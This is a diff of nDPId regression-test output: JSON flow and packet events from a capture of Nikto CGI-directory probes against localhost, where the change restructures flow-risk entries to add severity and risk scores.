-00862{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276714,"flow_last_seen":1576420276714,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"ts_msec":1576420276714,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/htbin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276717,"pkt":"AAAAAAAAAAAAAAAACABFAADD3hBAAEAGXiJ\/AAABfwAAAcHUH5AtGuYWzQuuvoAYAED+twAAAQEICp1m+xSdZvsUR0VUIC9jZ2liaW4vIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276717,"flow_last_seen":1576420276717,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276717,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49620,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgibin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"ts_msec":1576420276718,"pkt":"AAAAAAAAAAAAAAAACABFAADB4dFAAEAGWmN\/AAABfwAAAcHWH5B7V9nVmVXzCoAYAED+tQAAAQEICp1m+xadZvsWR0VUIC9jZ2lzLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCg0K"}
-00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276718,"flow_last_seen":1576420276718,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"ts_msec":1576420276718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgis\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276719,"pkt":"AAAAAAAAAAAAAAAACABFAADEZD1AAEAG1\/R\/AAABfwAAAcHYH5Ba2lwhPKb01YAYAED+uAAAAQEICp1m+xedZvsXR0VUIC9zY3JpcHRzLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276719,"flow_last_seen":1576420276719,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276721,"pkt":"AAAAAAAAAAAAAAAACABFAADEcYRAAEAGyq1\/AAABfwAAAcHaH5DTlEmfv44DhoAYAED+uAAAAQEICp1m+xmdZvsZR0VUIC9jZ2ktd2luLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276721,"flow_last_seen":1576420276721,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-win\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276722,"pkt":"AAAAAAAAAAAAAAAACABFAADF6C5AAEAGVAJ\/AAABfwAAAcHcH5DviNAxcnIUCYAYAED+uQAAAQEICp1m+xqdZvsaR0VUIC9mY2dpLWJpbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276722,"flow_last_seen":1576420276722,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276722,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fcgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1576420276724,"pkt":"AAAAAAAAAAAAAAAACABFAADEjEdAAEAGr+p\/AAABfwAAAcHeH5D1xLRZpE\/AW4AYAED+uAAAAQEICp1m+xydZvscR0VUIC9jZ2ktZXhlLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276724,"flow_last_seen":1576420276724,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"ts_msec":1576420276724,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-exe\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276725,"pkt":"AAAAAAAAAAAAAAAACABFAADFFmlAAEAGJch\/AAABfwAAAcHgH5D+Si57PKwG0oAYAED+uQAAAQEICp1m+x2dZvsdR0VUIC9jZ2ktaG9tZS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276725,"flow_last_seen":1576420276725,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276725,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-home\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276727,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276727,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1576420276727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276727,"pkt":"AAAAAAAAAAAAAAAACABFAADFtaJAAEAGho5\/AAABfwAAAcHiH5DFGI2++SyH14AYAED+uQAAAQEICp1m+x+dZvsfR0VUIC9jZ2ktcGVybC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
